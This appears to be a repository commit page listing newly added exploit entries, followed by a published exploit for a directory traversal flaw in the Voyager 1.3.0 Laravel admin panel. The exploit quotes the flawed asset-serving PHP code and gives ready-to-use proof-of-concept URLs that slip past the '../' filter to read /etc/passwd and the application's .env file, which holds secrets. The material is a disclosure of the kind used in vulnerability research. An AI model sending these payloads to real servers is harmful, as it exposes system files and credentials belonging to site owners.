95c6eeab79
33 changes to exploits/shellcodes NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) SpotIE 2.9.5 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Key' Denial of Service (PoC) BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC) ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC) NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Name' Denial of Service (PoC) TextCrawler Pro3.1.1 - Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC) Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC) NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC) Office Product Key Finder 1.5.4 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC) SpotMSN 2.4.6 - 'Name' Denial of Service (PoC) SpotIM 2.2 - 'Name' Denial Of Service FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) Duplicate Cleaner Pro 4 - Denial of Service (PoC) Microsoft Outlook VCF cards - Denial of Service (PoC) Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path Windows - Shell COM Server Registrar Local Privilege Escalation Dairy Farm Shop Management System 1.0 - 'username' SQL Injection Complaint Management System 4.0 - 'cid' SQL injection IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) Hostel Management System 2.0 - 'id' SQL Injection elaniin CMS 1.0 - Authentication Bypass Small CRM 2.0 - Authentication Bypass Voyager 1.3.0 - Directory Traversal Codoforum 4.8.3 - Persistent Cross-Site Scripting Django < 3.0 < 2.2 < 1.11 - Account Hijack Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
50 lines
No EOL
1.8 KiB
Text
50 lines
No EOL
1.8 KiB
Text
# Exploit Title: Voyager 1.3.0 - Directory Traversal
|
|
# Google Dork: N/A
|
|
# Date: January 2020-01-06
|
|
# Exploit Author: NgoAnhDuc
|
|
# Vendor Homepage: https://voyager.devdojo.com/
|
|
# Software Link:https://github.com/the-control-group/voyager/releases/tag/v1.3.0https://github.com/the-control-group/voyager/releases/tag/v1.2.7
|
|
# Version: 1.3.0 and bellow
|
|
# Tested on: Ubuntu 18.04
|
|
# CVE : N/A
|
|
|
|
|
|
Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php
|
|
|
|
========================================
|
|
|
|
public function assets(Request $request)
|
|
{
|
|
*$path = str_start(str_replace(['../', './'], '',
|
|
urldecode($request->path)), '/');*
|
|
* $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);*
|
|
if (File::exists($path)) {
|
|
$mime = '';
|
|
if (ends_with($path, '.js')) {
|
|
$mime = 'text/javascript';
|
|
} elseif (ends_with($path, '.css')) {
|
|
$mime = 'text/css';
|
|
} else {
|
|
$mime = File::mimeType($path);
|
|
}
|
|
$response = response(File::get($path), 200,
|
|
['Content-Type' => $mime]);
|
|
$response->setSharedMaxAge(31536000);
|
|
$response->setMaxAge(31536000);
|
|
$response->setExpires(new \DateTime('+1 year'));
|
|
return $response;
|
|
}
|
|
return response('', 404);
|
|
}
|
|
========================================
|
|
|
|
PoC:
|
|
|
|
passwd:
|
|
|
|
http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd
|
|
|
|
|
|
Laravel environment
|
|
file:http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F<web
|
|
root dir>/.env |